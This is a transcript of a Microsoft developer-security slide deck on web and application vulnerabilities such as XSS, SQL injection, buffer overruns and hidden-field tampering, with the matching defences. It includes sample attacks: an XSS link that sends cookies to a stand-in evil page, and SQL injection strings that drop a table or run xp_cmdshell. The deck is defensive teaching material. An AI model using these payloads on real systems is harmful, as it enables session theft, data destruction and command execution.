1 / 41

Managing Risk: Application Development Principles and Best Practices

Managing Risk: Application Development Principles and Best Practices. Dave Glover Microsoft Pty Ltd http://blogs.msdn.com/dglover. The Gartner Group states:

tyanne
Download Presentation

Managing Risk: Application Development Principles and Best Practices

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Managing Risk: Application Development Principles and Best Practices Dave Glover Microsoft Pty Ltd http://blogs.msdn.com/dglover

  2. The Gartner Group states: "Today over 70% of attacks against a company's Web site or Web application come at the 'Application Layer' not the Network or System layer."

  3. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  4. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  5. Buffer Overruns • Occurs when data exceeds the expected size and overwrites other values • Exists primarily in unmanaged C/C++ code • Includes four types: • Stack-based • Heap overruns • V-table and function pointer overwrites • Exception handler overwrites • Can be exploited by worms and can result in: • Access Violation (Denial of Service) • Instability • Code Injection

  6. How Stack-Based Buffer Overruns Work #include <string.h> void flawed(char * str) { char buffer[10]; strcpy(buffer, str); } void main() { flawed("This string is too long"); }

  7. Defending Against Buffer Overruns • Deprecated and should be avoided… • Strcpy, strncpy, CopyMemory MultiByteToWideChar,… • Use strsafe.h for safer buffer handling • Use the /GS compile option in Visual C++ .NET • Check all array indexes • Use recognized file-path processing methods, such as splitpath (C runtime) • Use managed code • But pay attention to PInvoke and COM Interop

  8. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  9. Arithmetic Errors • Occur when the limitations of a variable are exceeded • Lead to serious runtime issues • Are often overlooked and underestimated • Include: • Overflow – value too large for data type • Underflow – value too small for data type

  10. Arithmetic Overflow- CalEngine- Purchase.aspx- GoodPurchase.aspx

  11. Defending Against Arithmetic Errors • Understand the Limitations • Unit Test Boundary Conditions • Consider limitations of data types • Consider writing safe, reusable functions • Consider using a safe template class (if coding in C++) • Use Languages that support overflow checking – VB.NET and C# !!

  12. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  13. Cross-Site Scripting • Malicious script is sent to a Web application as input. • Echoed back to a user’s browser, where it is executed • Targets your users, your application is the vehicle • Attacks are via carefully crafted hyperlinks • Allows hackers to: • Execute malicious script in a client’s Web browser • Insert <script>, <object>, <applet>, <form>, and <embed> tags • Steal Web session information and cookies (inc Authentication) • Access the client computer resources

  14. How Cross-Site Scripting Works URL points to the site that the hacker wants to attack <a href="http://…/Search.aspx? Search=<script language='javascript'> document.location.replace ('http://localhost/EvilPage.aspx? Cookie=‘ + document.cookie); </script>">…</a> Query string contains embedded JavaScript that redirects to the hacker’s page and transmits any cookies issued by Search.aspx in a query string

  15. What Is One-Click Attack • Site offers persistent sign-in option (cookies) • Victim user navigates to (or opens) an HTML page – perhaps a “once in a lifetime offer” • One or more actions are carried out using the trustof the victim user which is completely unsuspectingto that user

  16. Cross Site Script Attacks- Search.aspx- Review.aspx- AntiXSS Library- Secure Controls- GoodSearch.aspx- Validation Controls- Secure Frames- One Click Attack

  17. Defending Against Cross-Site Scripting Attacks • Do not • Trust user input • Echo client-supplied data without encoding • Store secret information in cookies • Do • Take advantage of ASP.NET’s validateRequest • Take advantage of ASP.NET’s ViewStateUserKey • Consider AntiXSS for data encoding • Use the HttpOnly cookie option • Use the <frame> security attribute • Implement Secure Custom Controls

  18. Defending Against XSS • Input validation – First line of defense • Output encoding • Platform features • Server.HtmlEncode() • Ok: principle of exclusions or black-listing • Use Anti-XSS • Better: principle of inclusions or white-listing Context: Non-persistent XSS. The product search feature of WIDGETCO displays the ‘searchstring’ input without sanitizing or encoding: Bad code: someLabel.Text = "Results for " + searchstring + ":"; Mitigation using Anti-XSS: someLabel.Text = "Results for " + AntiXSS.EncodeHtml(searchstring) + ":";

  19. Defending Against One-Click Attack • Browser’s cross-frame security limits this to a “write-only” attack • Concept for defense: Require a data element in the request which the attacker can’t supply • Check Referrer field • In .Net 1.1 use ViewStateUserKey override protected void OnInit(EventArgs e) { // ... ViewStateUserKey=User.Identity.Name; // ... }

  20. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  21. SQL Injection • Adds SQL statements to user input to: • Probe databases, execute multiple SQL statements • Bypass authorization • Call built-in stored procedures • Exploits applications that don’t validate input • Input from <form> fields, query strings, cookies

  22. How SQL Injection Works Model Query SELECT COUNT (*) FROM Users WHERE UserName=‘Jeff’ AND Password=‘imbatman’ Malicious Query SELECT COUNT (*) FROM Users WHERE UserName=‘’ or 1=1-- AND Password=‘’ "or 1=1" matches every record in the table "--" comments out the remainder of the query

  23. Examples Of SQL Injection • If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following • ALFKI1001 • ALFKI1001' or 1=1 -- • ALFKI1001'; DROP TABLE OrderDetail -- • ALFKI1001'; exec xp_cmdshell('fdisk.exe') -- sqlString = Format.String( select count (*) from customers where username='{0}' and password='{1}‘, userName, password));

  24. SQL Injection Attack- Login Attack- Search Page Attack- SQL Cmd Shell Attack

  25. Defending Against SQL Injection • Code against SQL Injection Attacks • Sanitize all input • Don’t use Dynamic SQL commands • Use Secured Stored Procedures or Parameterized Commands • Run with least privilege • Never execute as “sa” • Restrict access to built-in stored procedures • Store connection strings securely • Integrated Security Better • Encrypt Web.Config Connections Section • DPAPI or Configuration Application Block • Do not echo database errors (fail intelligently) • Apply administrative protections to SQL Server http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp

  26. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  27. Key Plaintext Ciphertext Algorithm Cryptography Weaknesses • Inappropriate use of algorithms • Creating your own • Using weak ones • Incorrect application • Failure to keep keys secure • Insecure storage • Extensive duration of use • The human factor • Accidental release of private keys I need three of the above to decrypt your data!

  28. Defending Against Cryptography Weaknesses • Recycle keys periodically • Use ACLs to restrict access to keys • Store keys on an external device • Use larger keys to provide increased security • Use DPAPI to simplify key management, if possible • Do not implement your own cryptographic routines

  29. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  30. Hidden-Field Tampering • Exploits applications that persist data between requests by round-tripping it in hidden <input> fields • The technique • Look for <input type="hidden" … > tags • Submit bogus requests with modified value attributes to spoof a Web server

  31. How Hidden-Field Tampering Works Page contains this… <input type="hidden" id="price" value="10000.00"> Postback data should contain this… price="10000.00" Instead it contains this… price="1.00"

  32. Agenda • Buffer Overruns • Arithmetic Errors • Cross-site Scripting • SQL Injection • Cryptography Weaknesses • Hidden Field Tampering • Canonicalization Issues • Web Services Security • The Others… • … And Finally

  33. Canonicalization Issues • There is usually more than one way to name something • Alternate representations exist for: • File names • URLs • Devices (such as printers) • Hackers may exploit code that makes decisions based on file names or URLs

  34. Canonicalization IssuesExample 1: File Names

  35. Defending Against Canonicalization Issues • Use file-system security to restrict access to private data • Never make a decision based on a name • Disable the IIS Parent Paths setting • Encrypt Web.Config Sections

  36. Encrypting Web.config sections • aspnet_regiis -pc "SampleKeys" -exp • aspnet_regiis -pa "SampleKeys" “domain\acct” • aspnet_regiis -pef connectionStrings . • aspnet_regiis -pdf connectionStrings . • Web.config <configProtectedData defaultProvider="SampleProvider"> <providers> <add name="SampleProvider" type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL“ keyContainerName="SampleKeys" useMachineContainer="true" /> </providers> </configProtectedData>

  37. Traversal Attacks- PathTraversal.htm- ViewImage.aspx- GoodProducts.aspx- Web.Config Encryption

  38. Next Steps • Stay informed about security • Microsoft Developers Network Security Center • http://msdn.microsoft.com/security/ • Microsoft Security Guidance • http://www.microsoft.com/security/guidance/ • Get additional security training • Find online and in-person training seminars: • http://www.microsoft.com/seminar/events/security/ • Read the book: Writing Secure Code • Michael Howard and David LeBlanc • ISBN: 0-7356-1722-8

  39. Defending Against the Others • Improving Web Application Security • Threats and Countermeasures • http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp

  40. Security seminar follow up… • Security e-forum sitewww.microsoft.com.au/eforum • View On demand web casts of all presentations from this event (tell your work colleagues!) • Online Live chats • Have a live chat with the Microsoft security experts you’ll see today. Check the e-forum site for the Live Chat schedule. • Plus lots more… • Evaluation forms - we value your feedback! • Need help with your business’ security? • Q7 - register your interest on the eval form if you want to meet with Microsoft / a MS Security Solutions Partner to discuss solutions to address your Security challenges • Fill in your form to go into the draw to win a HP Media Centre PC or Xbox 360

More Related